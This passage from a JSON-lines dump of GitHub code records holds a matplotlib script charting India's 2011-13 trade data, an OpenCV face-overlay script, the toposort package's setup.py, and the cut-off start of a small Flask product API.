bbox_inches='tight')\nplt.clf()\n\n#for export\n\ntotal=df2['Value-INR-2011-12'].sum()\nsum2=op2['Value-INR-2011-12'].sum()\n\nother=total-sum2\t\t\t\t#calculating sum of other countries\nop2.loc[5]=['Others',other]\n\nslices=op2['Value-INR-2011-12']\n\ncountry=op2['Country']\n\nplt.pie(slices, labels=country)\n\n\nplt.title('Top 5 Country pie chart for export of year 2011-12')\n\n\nplt.savefig('image2.jpg', bbox_inches='tight')\nplt.clf()\n\n\n#bar chart for top 5 commodity\ncom1=df1.groupby('Commodity').agg({'Value-INR-2011-12':'sum'})\t\t\t\t#grouping sum of values of ech country\n\ncom2=df2.groupby('Commodity').agg({'Value-INR-2011-12':'sum'})\n\ncom1=com1.reset_index()\t\t\t\t\t\t#resettin index of both\ncom2=com2.reset_index()\n\ncom1=com1.nlargest(5, 'Value-INR-2011-12' )\t\t\t#returning commodities with top 5 values\ncom2=com2.nlargest(5, 'Value-INR-2011-12' )\n\ncom1=com1.reset_index()\t\t\t\t\t\t#resettin index of both\ncom2=com2.reset_index()\n\n#for import\n\nx=com1.index\ny=com1['Value-INR-2011-12']\n\n\n\nplt.bar(x,y, label='bar1', color='r')\nplt.xticks(x, com1['Commodity'],rotation='vertical')\nplt.title('Import bar chart of commodity of year 2011-12')\n\nplt.xlabel('Commodity')\nplt.ylabel('Value-INR-2011-12')\nplt.savefig('image3.jpg', bbox_inches='tight')\nplt.clf()\n\n#for export\nx=com2.index\ny=com2['Value-INR-2011-12']\n\n\n\nplt.bar(x,y, label='bar1', color='c')\nplt.xticks(x, com2['Commodity'],rotation='vertical')\nplt.title('Export bar chart of commodity of year 2011-12')\n\nplt.xlabel('Commodity')\nplt.ylabel('Value-INR-2011-12')\nplt.savefig('image4.jpg', bbox_inches='tight')\nplt.clf()\n\n\n#linegraph of 'TEA' between quantity and value , plotted for stat of each coountry\n\ntea1=df1[df1['Commodity']=='TEA']\ntea2=df2[df2['Commodity']=='TEA']\n\n#import\n\ntea1=tea1.sort_values(['Quantity-2011-12'])\n\nplt.plot(tea1['Quantity-2011-12'],tea1['Value-INR-2011-12'],label='Year 2011-12')\n\ntea1=tea1.sort_values(['Quantity-2012-13'])\n\nplt.plot(tea1['Quantity-2012-13'],tea1['Value-INR-2012-13'], label='Year 2012-13')\n\nplt.title('Import plot for TEA')\n\nplt.xlabel('quantity')\nplt.ylabel('value')\nplt.legend()\nplt.savefig('image5.jpg', bbox_inches='tight')\nplt.clf()\n\n#export\n\ntea2=tea2.sort_values(['Quantity-2011-12'])\n\nplt.plot(tea2['Quantity-2011-12'],tea2['Value-INR-2011-12'],label='Year 
2011-12')\n\ntea2=tea2.sort_values(['Quantity-2012-13'])\n\nplt.plot(tea2['Quantity-2012-13'],tea2['Value-INR-2012-13'], label='Year 2012-13')\n\nplt.title('Export plot for TEA')\n\nplt.xlabel('quantity')\nplt.ylabel('value')\nplt.legend()\nplt.savefig('image6.jpg', bbox_inches='tight')\nplt.clf()\n\n\n#Scatterplot of 'RICE' between quantity and value, plotted for stats of each country\n\nrice1=df1[df1['Commodity']=='RICE']\nrice2=df2[df2['Commodity']=='RICE']\n\n#import\n\nrice1=rice1.sort_values(['Quantity-2011-12'])\n\nplt.scatter(rice1['Quantity-2011-12'],rice1['Value-INR-2011-12'],label='Year 2011-12' , marker='x',s=10)\n\nrice1=rice1.sort_values(['Quantity-2012-13'])\n\nplt.scatter(rice1['Quantity-2012-13'],rice1['Value-INR-2012-13'], label='Year 2012-13',marker='o',s=10)\n\nplt.title('Import scatter plot for RICE')\n\nplt.xlabel('quantity')\nplt.ylabel('value')\nplt.legend()\nplt.savefig('image7.jpg', bbox_inches='tight')\nplt.clf()\n\n#Export\n\nrice2=rice2.sort_values(['Quantity-2011-12'])\n\nplt.scatter(rice2['Quantity-2011-12'],rice2['Value-INR-2011-12'],label='Year 2011-12' , marker='x',s=10)\n\nrice2=rice2.sort_values(['Quantity-2012-13'])\n\nplt.scatter(rice2['Quantity-2012-13'],rice2['Value-INR-2012-13'], label='Year 2012-13',marker='o',s=10)\n\nplt.title('Export scatter plot for RICE')\n\nplt.xlabel('quantity')\nplt.ylabel('value')\nplt.legend()\nplt.savefig('image8.jpg', bbox_inches='tight')\nplt.clf()\n\n\n#histogram\ncom1=df1.groupby('Country').agg({'Value-INR-2011-12':'sum'})\t\t\t\t#grouping sum of values of each country\n\ncom2=df2.groupby('Country').agg({'Value-INR-2011-12':'sum'})\n\ncom1=com1.reset_index()\t\t\t\t\t\t#resetting index of both\ncom2=com2.reset_index()\n\n#for import\n\n\ny=com1['Value-INR-2011-12']\n\n\n\nplt.hist(y , color='y',histtype='bar', rwidth=0.7)\n#plt.xticks(x, com1['Commodity'],rotation='vertical')\nplt.title('Import histogram of commodity of year 2011-12')\n\nplt.xlabel('Range of value')\nplt.ylabel('Number of countries ')\nplt.savefig('image9.jpg', bbox_inches='tight')\nplt.clf()\n\n#for export\n\n\ny=com2['Value-INR-2011-12']\n\n\n\nplt.hist(y , color='b',histtype='bar', rwidth=0.7)\n#plt.xticks(x, com1['Commodity'],rotation='vertical')\nplt.title('Export histogram of commodity of year 2011-12')\n\nplt.xlabel('Range of value')\nplt.ylabel('Number of countries ')\nplt.savefig('image10.jpg', bbox_inches='tight')\nplt.clf()\n\n\n#table to latex file\ntea1=tea1.reset_index()\t\ntea1.to_latex(writer)\n","repo_name":"avais25/Software-Lab-CS699","sub_path":"lab-9-pyplot-latex/figures.py","file_name":"figures.py","file_ext":"py","file_size_in_byte":5695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"26864442167","text":"# coding=utf-8\n# import numpy as np\nimport cv2\n\ndef resize_image(image, scale_percent=50):\n rows, cols = image.shape[:2]\n width = int(cols * scale_percent / 100)\n height = int(rows * scale_percent / 100)\n dim = (width, height)\n image = cv2.resize(image, dim, interpolation=cv2.INTER_AREA)\n return image\n\ndef put_object(img,object, x, y, adjx=15, adjy=15):\n obj_rows, obj_cols = object.shape[:2]\n roi_img = img[(y-adjy):(y-adjy)+obj_rows, (x-adjx):(x-adjx)+obj_cols] \n roi_img [object < [150,150,150]] = object [object < [150,150,150]] \n return img\n \n# ==========================================================================\nface_cascade = cv2.CascadeClassifier(\n '../classificadores/haarcascade_frontalface_default.xml')\neye_cascade = cv2.CascadeClassifier('../classificadores/haarcascade_eye.xml')\nmouth_cascade = cv2.CascadeClassifier(\n '../classificadores/haarcascade_mcs_mouth.xml')\n# ==========================================================================\n\nimg = cv2.imread('face.jpg')\nimg = resize_image(img)\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\nmoustache = cv2.imread('moustache_w.png')\nmoustache = resize_image(moustache, 30)\n\n\nglasses = cv2.imread('sungalsses_w.png')\nglasses = resize_image(glasses, 30)\n\nfaces = face_cascade.detectMultiScale(gray)\nfor (x, y, w, h) in faces:\n # cv2.rectangle(img, (x, y), (x+w, y+h), (255, 0, 0), 2)\n roi_gray = gray[y:y+h, x:x+w]\n roi_color = img[y:y+h, x:x+w]\n\n eyes = eye_cascade.detectMultiScale(roi_gray, 1.1, 10) \n for (ex, ey, ew, eh) in eyes:\n roi_color = put_object(roi_color, glasses, ex, ey, 14, -10)\n break\n # cv2.rectangle(roi_color, (ex, ey), (ex+ew, ey+eh), (0, 255, 0), 2)\n \n\n mouth = mouth_cascade.detectMultiScale(roi_gray, 2.0, 20)\n for (mx, my, mw, mh) in mouth:\n roi_color = put_object(roi_color, moustache, mx, my, 15,15)\n # cv2.rectangle(roi_color, (mx, my), (mx+mw, my+mh), (0, 0, 255), 2)\n # break\n\ncv2.imshow('Turing', img)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"heloisaGuimaraes/tarefas-processamento-de-imagens-ifma","sub_path":"Aula 13/Filtro Deteccao Face/Exemplo_Faces.py","file_name":"Exemplo_Faces.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"35200055455","text":"from __future__ import print_function\nfrom distutils.core import setup, Command\nimport sys\n\n# This is a hack in order to get the package name to be different when\n# building an RPM file. When 'setup.py bdist_rpm' is called, it invokes\n# setup.py twice more, with these command lines:\n# ['setup.py', 'build']\n# ['setup.py', 'install', '-O1', '--root=/home/eric/local/toposort/build/bdist.linux-i686/rpm/BUILDROOT/python-toposort-0.1-1.i386', '--record=INSTALLED_FILES']\n# It's only on the original call (when bdist_rpm is in sys.argv) that\n# I adjust the package name. With Python 2.7, that's enough. I'm not\n# sure about 3.x.\n\nname = 'toposort'\nif 'bdist_rpm' in sys.argv:\n name = 'python{0}-{1}'.format('' if sys.version_info.major == 2 else '3', name)\n\n\n# run our tests\nclass PyTest(Command):\n user_options = []\n def initialize_options(self):\n pass\n def finalize_options(self):\n pass\n def run(self):\n import sys, subprocess\n tests = [('test suite', ['-m', 'test.test_toposort']),\n ]\n if sys.hexversion >= 0x03000000:\n # Skip doctests for python < 3.0. They use set literal reprs, which\n # are different in 2.7. Testing under 3.x is good enough.\n tests.append(('doctests', ['-m' 'doctest', 'README.txt']))\n for name, cmds in tests:\n print(name)\n errno = subprocess.call([sys.executable] + cmds)\n if errno != 0:\n raise SystemExit(errno)\n print('test complete')\n\n\nsetup(name=name,\n version='1.4',\n url='https://bitbucket.org/ericvsmith/toposort',\n author='Eric V. Smith',\n author_email='eric@trueblade.com',\n description='Implements a topological sort algorithm.',\n long_description=open('README.txt').read() + '\\n' + open('CHANGES.txt').read(),\n classifiers=['Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: Apache Software License',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4',\n ],\n license='Apache License Version 2.0',\n py_modules=['toposort'],\n\n cmdclass = {'test': PyTest},\n )\n","repo_name":"tdrhq/bark","sub_path":"toposort-1.4/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"694015899","text":"import flask\nfrom flask import request, jsonify\n\napp = flask.Flask(__name__)\napp.config[\"DEBUG\"] = True\n\n# Test data\nproducts = {'cycling': ['helmet','bike','wheels'],\n 'skiing': ['skis','poles'],\n 'running':['shoes','t-shirt','socks'],\n 'swimming':['bathing suits','swimming cap']}\n\n\n\n@app.route('/', methods=['GET'])\ndef home():\n return '''